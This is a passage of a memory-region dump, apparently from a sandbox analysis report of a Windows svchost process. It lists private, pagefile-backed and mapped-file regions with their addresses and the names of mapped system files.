	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62280000"
	        filename = ""

Region:
	              id = 2663
	        start_va = 0xf62380000
	          end_va = 0xf6247ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62380000"
	        filename = ""

Region:
	              id = 2664
	        start_va = 0xf62480000
	          end_va = 0xf6257ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62480000"
	        filename = ""

Region:
	              id = 2665
	        start_va = 0xf62580000
	          end_va = 0xf6267ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62580000"
	        filename = ""

Region:
	              id = 2666
	        start_va = 0xf62680000
	          end_va = 0xf626fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62680000"
	        filename = ""

Region:
	              id = 2667
	        start_va = 0xf62700000
	          end_va = 0xf627fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62700000"
	        filename = ""

Region:
	              id = 2668
	        start_va = 0xf62800000
	          end_va = 0xf628fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62800000"
	        filename = ""

Region:
	              id = 2669
	        start_va = 0xf62900000
	          end_va = 0xf629fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62900000"
	        filename = ""

Region:
	              id = 2670
	        start_va = 0xf62a00000
	          end_va = 0xf62afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62a00000"
	        filename = ""

Region:
	              id = 2671
	        start_va = 0xf62b00000
	          end_va = 0xf62bfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62b00000"
	        filename = ""

Region:
	              id = 2672
	        start_va = 0xf62c00000
	          end_va = 0xf62cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62c00000"
	        filename = ""

Region:
	              id = 2673
	        start_va = 0xf62d00000
	          end_va = 0xf62d7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62d00000"
	        filename = ""

Region:
	              id = 2674
	        start_va = 0xf62d80000
	          end_va = 0xf62e7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62d80000"
	        filename = ""

Region:
	              id = 2675
	        start_va = 0xf62e80000
	          end_va = 0xf62efffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62e80000"
	        filename = ""

Region:
	              id = 2676
	        start_va = 0xf62f00000
	          end_va = 0xf62ffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62f00000"
	        filename = ""

Region:
	              id = 2677
	        start_va = 0xf63000000
	          end_va = 0xf6307ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63000000"
	        filename = ""

Region:
	              id = 2678
	        start_va = 0xf63080000
	          end_va = 0xf6317ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63080000"
	        filename = ""

Region:
	              id = 2679
	        start_va = 0xf63180000
	          end_va = 0xf6327ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63180000"
	        filename = ""

Region:
	              id = 2680
	        start_va = 0xf63280000
	          end_va = 0xf6337ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63280000"
	        filename = ""

Region:
	              id = 2681
	        start_va = 0xf63380000
	          end_va = 0xf6347ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63380000"
	        filename = ""

Region:
	              id = 2682
	        start_va = 0xf63480000
	          end_va = 0xf6357ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63480000"
	        filename = ""

Region:
	              id = 2683
	        start_va = 0xf63580000
	          end_va = 0xf6367ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63580000"
	        filename = ""

Region:
	              id = 2684
	        start_va = 0xf63680000
	          end_va = 0xf6377ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63680000"
	        filename = ""

Region:
	              id = 2685
	        start_va = 0xf63780000
	          end_va = 0xf6387ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63780000"
	        filename = ""

Region:
	              id = 2686
	        start_va = 0xf63880000
	          end_va = 0xf638fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63880000"
	        filename = ""

Region:
	              id = 2687
	        start_va = 0xf63900000
	          end_va = 0xf6397ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63900000"
	        filename = ""

Region:
	              id = 2688
	        start_va = 0xf63980000
	          end_va = 0xf639fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63980000"
	        filename = ""

Region:
	              id = 2689
	        start_va = 0xf63a00000
	          end_va = 0xf63afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63a00000"
	        filename = ""

Region:
	              id = 2690
	        start_va = 0xf63b00000
	          end_va = 0xf63bfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63b00000"
	        filename = ""

Region:
	              id = 2691
	        start_va = 0xf63c00000
	          end_va = 0xf63cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63c00000"
	        filename = ""

Region:
	              id = 2692
	        start_va = 0xf63d00000
	          end_va = 0xf63dfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63d00000"
	        filename = ""

Region:
	              id = 2693
	        start_va = 0xf63e00000
	          end_va = 0xf63efffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63e00000"
	        filename = ""

Region:
	              id = 2694
	        start_va = 0xf63f00000
	          end_va = 0xf63ffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f63f00000"
	        filename = ""

Region:
	              id = 2695
	        start_va = 0xf64000000
	          end_va = 0xf6407ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64000000"
	        filename = ""

Region:
	              id = 2696
	        start_va = 0xf64080000
	          end_va = 0xf6417ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64080000"
	        filename = ""

Region:
	              id = 2697
	        start_va = 0xf64180000
	          end_va = 0xf6427ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64180000"
	        filename = ""

Region:
	              id = 2698
	        start_va = 0xf64280000
	          end_va = 0xf6437ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64280000"
	        filename = ""

Region:
	              id = 2699
	        start_va = 0xf64380000
	          end_va = 0xf6447ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64380000"
	        filename = ""

Region:
	              id = 2700
	        start_va = 0xf64480000
	          end_va = 0xf6457ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64480000"
	        filename = ""

Region:
	              id = 2701
	        start_va = 0xf64580000
	          end_va = 0xf6467ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64580000"
	        filename = ""

Region:
	              id = 2702
	        start_va = 0xf64680000
	          end_va = 0xf6477ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64680000"
	        filename = ""

Region:
	              id = 2703
	        start_va = 0xf64780000
	          end_va = 0xf6487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64780000"
	        filename = ""

Region:
	              id = 2704
	        start_va = 0xf64880000
	          end_va = 0xf6497ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f64880000"
	        filename = ""

Region:
	              id = 2705
	        start_va = 0xf65080000
	          end_va = 0xf650fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f65080000"
	        filename = ""

Region:
	              id = 2706
	        start_va = 0xf65200000
	          end_va = 0xf6527ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f65200000"
	        filename = ""

Region:
	              id = 2707
	        start_va = 0xf65680000
	          end_va = 0xf6577ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f65680000"
	        filename = ""

Region:
	              id = 2708
	        start_va = 0xf65d80000
	          end_va = 0xf65dfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f65d80000"
	        filename = ""

Region:
	              id = 2709
	        start_va = 0xf66380000
	          end_va = 0xf6647ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f66380000"
	        filename = ""

Region:
	              id = 2710
	        start_va = 0x18089120000
	          end_va = 0x1808912ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089120000"
	        filename = ""

Region:
	              id = 2711
	        start_va = 0x18089130000
	          end_va = 0x18089130fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "svchost.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")

Region:
	              id = 2712
	        start_va = 0x18089140000
	          end_va = 0x18089154fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089140000"
	        filename = ""

Region:
	              id = 2713
	        start_va = 0x18089160000
	          end_va = 0x18089163fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089160000"
	        filename = ""

Region:
	              id = 2714
	        start_va = 0x18089170000
	          end_va = 0x18089170fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089170000"
	        filename = ""

Region:
	              id = 2715
	        start_va = 0x18089180000
	          end_va = 0x18089181fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089180000"
	        filename = ""

Region:
	              id = 2716
	        start_va = 0x18089190000
	          end_va = 0x1808924dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2717
	        start_va = 0x18089250000
	          end_va = 0x18089250fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089250000"
	        filename = ""

Region:
	              id = 2718
	        start_va = 0x18089260000
	          end_va = 0x18089260fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089260000"
	        filename = ""

Region:
	              id = 2719
	        start_va = 0x18089270000
	          end_va = 0x18089270fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089270000"
	        filename = ""

Region:
	              id = 2720
	        start_va = 0x18089280000
	          end_va = 0x18089286fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089280000"
	        filename = ""

Region:
	              id = 2721
	        start_va = 0x18089290000
	          end_va = 0x18089290fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089290000"
	        filename = ""

Region:
	              id = 2722
	        start_va = 0x180892a0000
	          end_va = 0x180892a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000180892a0000"
	        filename = ""

Region:
	              id = 2723
	        start_va = 0x180892b0000
	          end_va = 0x180892b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000180892b0000"
	        filename = ""

Region:
	              id = 2724
	        start_va = 0x180892c0000
	          end_va = 0x180892ccfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "gpsvc.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")

Region:
	              id = 2725
	        start_va = 0x180892d0000
	          end_va = 0x180892d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000180892d0000"
	        filename = ""

Region:
	              id = 2726
	        start_va = 0x180892e0000
	          end_va = 0x180892e1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000180892e0000"
	        filename = ""

Region:
	              id = 2727
	        start_va = 0x180892f0000
	          end_va = 0x180892f3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 2728
	        start_va = 0x18089300000
	          end_va = 0x18089306fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089300000"
	        filename = ""

Region:
	              id = 2729
	        start_va = 0x18089310000
	          end_va = 0x18089310fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089310000"
	        filename = ""

Region:
	              id = 2730
	        start_va = 0x18089320000
	          end_va = 0x1808932cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "iphlpsvc.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui")

Region:
	              id = 2731
	        start_va = 0x18089330000
	          end_va = 0x18089336fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089330000"
	        filename = ""

Region:
	              id = 2732
	        start_va = 0x18089340000
	          end_va = 0x180893fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089340000"
	        filename = ""

Region:
	              id = 2733
	        start_va = 0x18089400000
	          end_va = 0x180894fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089400000"
	        filename = ""

Region:
	              id = 2734
	        start_va = 0x18089500000
	          end_va = 0x180895fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089500000"
	        filename = ""

Region:
	              id = 2735
	        start_va = 0x18089600000
	          end_va = 0x18089787fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089600000"
	        filename = ""

Region:
	              id = 2736
	        start_va = 0x18089790000
	          end_va = 0x18089910fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018089790000"
	        filename = ""

Region:
	              id = 2737
	        start_va = 0x18089920000
	          end_va = 0x18089964fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db")

Region:
	              id = 2738
	        start_va = 0x18089970000
	          end_va = 0x18089973fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 2739
	        start_va = 0x18089980000
	          end_va = 0x18089990fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "propsys.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")

Region:
	              id = 2740
	        start_va = 0x180899a0000
	          end_va = 0x180899a1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000180899a0000"
	        filename = ""

Region:
	              id = 2741
	        start_va = 0x180899b0000
	          end_va = 0x180899b6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000180899b0000"
	        filename = ""

Region:
	              id = 2742
	        start_va = 0x180899c0000
	          end_va = 0x180899c1fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "activeds.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui")

Region:
	              id = 2743
	        start_va = 0x180899d0000
	          end_va = 0x180899d4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "winnlsres.dll"
	        filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")

Region:
	              id = 2744
	        start_va = 0x180899e0000
	          end_va = 0x180899effff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "winnlsres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")

Region:
	              id = 2745
	        start_va = 0x180899f0000
	          end_va = 0x180899f8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")

Region:
	              id = 2746
	        start_va = 0x18089a00000
	          end_va = 0x18089afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089a00000"
	        filename = ""

Region:
	              id = 2747
	        start_va = 0x18089b00000
	          end_va = 0x18089bfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089b00000"
	        filename = ""

Region:
	              id = 2748
	        start_va = 0x18089c00000
	          end_va = 0x18089f36fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2749
	        start_va = 0x18089f40000
	          end_va = 0x1808a03ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018089f40000"
	        filename = ""

Region:
	              id = 2750
	        start_va = 0x1808a040000
	          end_va = 0x1808a040fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a040000"
	        filename = ""

Region:
	              id = 2751
	        start_va = 0x1808a050000
	          end_va = 0x1808a051fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "dosvc.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui")

Region:
	              id = 2752
	        start_va = 0x1808a060000
	          end_va = 0x1808a062fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "mswsock.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui")

Region:
	              id = 2753
	        start_va = 0x1808a070000
	          end_va = 0x1808a080fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_1256.nls"
	        filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls")

Region:
	              id = 2754
	        start_va = 0x1808a090000
	          end_va = 0x1808a096fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a090000"
	        filename = ""

Region:
	              id = 2755
	        start_va = 0x1808a0a0000
	          end_va = 0x1808a0a1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a0a0000"
	        filename = ""

Region:
	              id = 2756
	        start_va = 0x1808a0b0000
	          end_va = 0x1808a0b9fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "crypt32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui")

Region:
	              id = 2757
	        start_va = 0x1808a0c0000
	          end_va = 0x1808a0c6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a0c0000"
	        filename = ""

Region:
	              id = 2758
	        start_va = 0x1808a0d0000
	          end_va = 0x1808a0e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_1251.nls"
	        filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls")

Region:
	              id = 2759
	        start_va = 0x1808a0f0000
	          end_va = 0x1808a0f0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "usocore.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui")

Region:
	              id = 2760
	        start_va = 0x1808a100000
	          end_va = 0x1808a1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a100000"
	        filename = ""

Region:
	              id = 2761
	        start_va = 0x1808a200000
	          end_va = 0x1808a2fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a200000"
	        filename = ""

Region:
	              id = 2762
	        start_va = 0x1808a300000
	          end_va = 0x1808a3dffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")

Region:
	              id = 2763
	        start_va = 0x1808a3e0000
	          end_va = 0x1808a3f0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_1254.nls"
	        filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls")

Region:
	              id = 2764
	        start_va = 0x1808a400000
	          end_va = 0x1808a4fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a400000"
	        filename = ""

Region:
	              id = 2765
	        start_va = 0x1808a500000
	          end_va = 0x1808a58dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")

Region:
	              id = 2766
	        start_va = 0x1808a590000
	          end_va = 0x1808a5a0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_1250.nls"
	        filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls")

Region:
	              id = 2767
	        start_va = 0x1808a5b0000
	          end_va = 0x1808a5c0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_1253.nls"
	        filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls")

Region:
	              id = 2768
	        start_va = 0x1808a5d0000
	          end_va = 0x1808a5e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_1257.nls"
	        filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls")

Region:
	              id = 2769
	        start_va = 0x1808a5f0000
	          end_va = 0x1808a600fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_1255.nls"
	        filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")

Region:
	              id = 2770
	        start_va = 0x1808a610000
	          end_va = 0x1808a637fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_932.nls"
	        filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls")

Region:
	              id = 2771
	        start_va = 0x1808a640000
	          end_va = 0x1808a670fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_949.nls"
	        filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls")

Region:
	              id = 2772
	        start_va = 0x1808a680000
	          end_va = 0x1808a690fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_874.nls"
	        filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls")

Region:
	              id = 2773
	        start_va = 0x1808a6a0000
	          end_va = 0x1808a6b0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_1258.nls"
	        filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls")

Region:
	              id = 2774
	        start_va = 0x1808a6f0000
	          end_va = 0x1808a6f6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a6f0000"
	        filename = ""

Region:
	              id = 2775
	        start_va = 0x1808a710000
	          end_va = 0x1808a716fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a710000"
	        filename = ""

Region:
	              id = 2776
	        start_va = 0x1808a740000
	          end_va = 0x1808a746fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a740000"
	        filename = ""

Region:
	              id = 2777
	        start_va = 0x1808a750000
	          end_va = 0x1808a780fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_936.nls"
	        filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls")

Region:
	              id = 2778
	        start_va = 0x1808a790000
	          end_va = 0x1808a7c0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "c_950.nls"
	        filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls")

Region:
	              id = 2779
	        start_va = 0x1808a890000
	          end_va = 0x1808a896fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a890000"
	        filename = ""

Region:
	              id = 2780
	        start_va = 0x1808a900000
	          end_va = 0x1808a9fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808a900000"
	        filename = ""

Region:
	              id = 2781
	        start_va = 0x1808aa00000
	          end_va = 0x1808aafffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808aa00000"
	        filename = ""

Region:
	              id = 2782
	        start_va = 0x1808ab00000
	          end_va = 0x1808abfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808ab00000"
	        filename = ""

Region:
	              id = 2783
	        start_va = 0x1808ac00000
	          end_va = 0x1808acfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808ac00000"
	        filename = ""

Region:
	              id = 2784
	        start_va = 0x1808ad00000
	          end_va = 0x1808adfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808ad00000"
	        filename = ""

Region:
	              id = 2785
	        start_va = 0x1808ae00000
	          end_va = 0x1808aefffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808ae00000"
	        filename = ""

Region:
	              id = 2786
	        start_va = 0x1808af00000
	          end_va = 0x1808affffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808af00000"
	        filename = ""

Region:
	              id = 2787
	        start_va = 0x1808b000000
	          end_va = 0x1808b0fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808b000000"
	        filename = ""

Region:
	              id = 2788
	        start_va = 0x1808b100000
	          end_va = 0x1808b1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808b100000"
	        filename = ""

Region:
	              id = 2789
	        start_va = 0x1808b200000
	          end_va = 0x1808b2fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808b200000"
	        filename = ""

Region:
	              id = 2790
	        start_va = 0x1808b300000
	          end_va = 0x1808b3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808b300000"
	        filename = ""

Region:
	              id = 2791
	        start_va = 0x1808b400000
	          end_va = 0x1808b4fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001808b400000"
	        filename = ""

Region:
	              id = 2792
	        start_va = 0x7df5ffd70000
	          end_va = 0x7ff5ffd6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffd70000"
	        filename = ""

Region:
	              id = 2793
	        start_va = 0x7ff78bff0000
	          end_va = 0x7ff78c0effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff78bff0000"
